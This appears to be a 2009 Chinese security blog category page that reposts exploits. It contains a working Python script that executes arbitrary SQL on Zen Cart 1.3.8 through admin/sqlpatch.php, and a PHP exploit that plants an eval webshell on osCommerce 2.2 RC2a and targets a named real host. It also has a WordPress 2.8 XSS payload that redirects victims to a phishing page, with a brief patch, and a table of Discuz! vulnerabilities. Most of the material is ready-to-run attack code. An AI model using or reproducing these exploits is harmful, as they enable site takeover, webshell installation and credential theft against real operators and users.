信息安全Security分类

  • Zen Cart admin/sqlpatch.php模块SQL注入漏洞
  • Wordpress 2.8 All Version Xss 0DAY
  • Discuz 攻击/BUGs by 8ovul.com
  • osCommerce Online Merchant 2.2 RC2a RCE Exploit 攻击代码(by Flyh4t)
    • 我来评论
    九月
    11
    2009

    Zen Cart admin/sqlpatch.php模块SQL注入漏洞

    4
    作者:AirForce 
    #!/usr/bin/python

#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#

#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
#	DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
#	DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';

import urllib, urllib2, re, sys

a,b = sys.argv,0

def option(name, need = 0):
	global a, b
	for param in sys.argv:
		if(param == '-'+name): return str(sys.argv[b+1])
		b = b + 1
	if(need):
		print '\n#error', "-"+name, 'parameter required'
		exit(1)

if (len(sys.argv) < 2):
	print """
=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit  ____________=
========================================================================
|                  BlackH <Bl4ck.H@gmail.com>                          |
========================================================================
|                                                                      |
| $system> python """+sys.argv[0]+""" -url <url>                                 |
| Param: <url>      ex: http://victim.com/site (no slash)              |
|                                                                      |
| Note: blind "injection"                                              |
========================================================================
	"""
	exit(1)

url, trick = option('url', 1), "/password_forgotten.php"

while True:
	cmd = raw_input('sql@jah$ ')
	if (cmd == "exit"): exit(1)
	req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
	if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
		print '>> success (', cmd, ")"
	else:
		print '>> failed, be sure to end with ; (', cmd, ")"
    分类
    标签
    我来评论
    九月
    11
    2009

    osCommerce Online Merchant 2.2 RC2a RCE Exploit 攻击代码(by Flyh4t)

    1
    作者:AirForce 
    <?php
print_r('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: phpsec@hotmail.com
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
');
$host ='democn.51osc.com';
$path = '/';
$admin_path = 'admin/';
$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_POST[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
    echo '[~]No response from'.$host;
    die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>

# milw0rm.com [2009-08-31]
    分类
    标签
    1条评论
    八月
    30
    2009

    WordPress 2.8 All Version Xss 0DAY

    2
    作者:AirForce

    From:vul.kr

    It had been published that wordpress 2.8 All version are suffering from Xss,attackers can use this to do fishing,they make a wordpress login page as it is your own.If you don’t take care,your password will be sent to the attacker’s website.With your password,they can edit pages and upload webshell.It is harmful.

    How is the attacker do this?
    they insert website url like this(in the comments write place):

    http://www.lengmo.net’onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,118,117,108,46,107,114,47,63,112,61,53,54,57);

    If someone(or administrator) moved his mouse on the author’s website.It will jump to another URL,which is a fishing page.

    How can we patch it?Edit wp-comments-post.php  go line 40 and then add:

    $comment_author_url = str_replace(chr(39),”,$comment_author_url);
    $comment_author_url = str_replace(chr(59),”,$comment_author_url);
    $comment_author_url = str_replace(chr(44),”,$comment_author_url);
    分类
    标签
    我来评论
    八月
    29
    2009

    Discuz 攻击/BUGs by 8ovul.com

    1
    作者:AirForce

    Some Of Discuz! Bugs[www.80vul.com]

    “Crossday Discuz! Board 论坛系统(简称 Discuz! 论坛,中国国家版权局著作权登记号 2006SR11895)是一个采用 PHP 和 MySQL 等其他多种数据库构建的高效论坛解决方案。作为商业软件产品, Discuz! 在代码质量,运行效率,负载能力,安全等级,功能可操控性和权限严密性等方面都在广大用户中有良好的口碑。凭借 Discuz! 开发组长期积累的丰富的 web 开发及数据库经验,和强于创新,追求完美的设计理念,使得 Discuz! 在很短时间内以其鲜明的个性特色从国内外同类产品中脱颖而出。经过了效率最优化和负载能力最佳化设计的 Discuz! ,已获得业内越来越多专家和权威企业的认可。”以上是官方自己的介绍。
    # Title Description PoC/Exploit Fix
    18 Discuz! admin\styles.inc.php get-webshell bug 由于Discuz!的admin\styles.inc.php里preg_match正则判断$newcvar变量操作不够严谨,导致执行代码漏洞. SODB-2009-02.txt NO
    17 Discuz!<5.50 $onlineipmatches 未初始化漏洞 由于Discuz!<5.50的common.inc.php使用preg_match()的变量$onlineipmatches 未初始化漏洞,导致可以容易构造$onlineip SODB-2009-01.txt yes
    16 Discuz! 1_modcp_editpost.tpl.php xss bug 由于Discuz!的1_modcp_editpost.tpl.php里$orig['message']未过滤,导致一个xss漏洞. SODB-2008-16.txt NO
    15 Discuz! admin\database.inc.php get-webshell bug 由于Discuz!的admin\database.inc.php里action=importzip解压zip文件时,导致可以得到webshell. SODB-2008-15.txt NO
    14 Discuz! Reset User Password Vulnerability 由于Discuz! 的 随机数使用的播种缺陷,在找会用户密码时可以暴力得到id的随机hash,从而导致容易修改用户密码的严重漏洞. dz-exp-sodb-2008-14_php.htm NO
    13 Discuz! $_DCACHE数组变量覆盖漏洞 [update 11.14] 由于Discuz! 的wap\index.php调用Chinese类里Convert方法在处理post数据时不当忽视对数组的处理,可使数组被覆盖为NULL.当覆盖$_DCACHE时导致导致xss sql注射 代码执行等众多严重的安全问题. dz-exp-sodb-2008-13_php.htm NO
    12 Discuz! 路径信息泄露 bug 由于Discuz! cache file的数组$_DCACHE,$_CACHE等的变量名没有初始化导致路径信息泄露. SODB-2008-12.txt NO
    11 Discuz! member.php xss bug 由于Discuz!的member.php对$listgid并没有初始化导致一个严重的xss bug. SODB-2008-11.txt NO
    10 Discuz! admin\runwizard.inc.php get-webshell bug 由于Discuz!的admin\runwizard.inc.php里saverunwizardhistory()写文件操作没有限制导致执行代码漏洞. SODB-2008-10.txt NO
    9 Discuz! modcp\moderate.inc.php 数据库注射bug 由于Discuz!的modcp/moderate.inc.php里$fidadd数组变量没有初始化导致sql注射bug SODB-2008-09.txt NO
    8 Discuz! moderation.inc.php 数据库’注射’ bug 由于Discuz!的include/moderation.inc.php存在一个’二次攻击’导致数据库’注射’的bug SODB-2008-08.txt NO
    7 Discuz! trade.php 数据库’注射’ bug 由于Discuz!的trade.php里的$message处理不严格导致引起数据库操作错误,通过SODB-2008-06而导致xss攻击及数据库信息泄露的漏洞. SODB-2008-07.txt NO
    6 Discuz! 数据库错误信息xss bug 由于Discuz!在处理数据库的错误信息时对$GLOBALS['PHP_SELF']没有过滤,导致在让数据库出错的情况下导致xss攻击. NO
    5 Discuz!4.x wap\index.php 变量覆盖漏洞 由于Discuz!的wap\index.php处理post的变量不严谨而导致变量覆盖,从而可能导致sql注射/代码执行/xss等攻击. 暂缺 YES
    4 Discuz! cache.func.php信息泄漏的bug 由于Discuz!的\include\cache.func.php缺少访问限制导致版本及补丁消息的泄露. SODB-2008-04.txt NO
    3 Discuz! flash Crsf bug 由于Discuz!对flash跨域策略文件及上传图片文件处理不严导致可以绕过formhash及Referer的限制,导致csrf攻击. SODB-2008-03.fla NO
    2 Discuz! admincp.php xss bug 由于Discuz!的后台登陆文件$url_forward没有过滤导致一个严重的xss bug. SODB-2008-02.txt NO
    1 Discuz![flash] xss bug 由于Discuz!对上传图片文件处理不严及flash标签安全设置不严导致一个严重的xss bug. SODB-2008-01.fla/gif NO

    http://www.80vul.com/dzvul/

    分类
    标签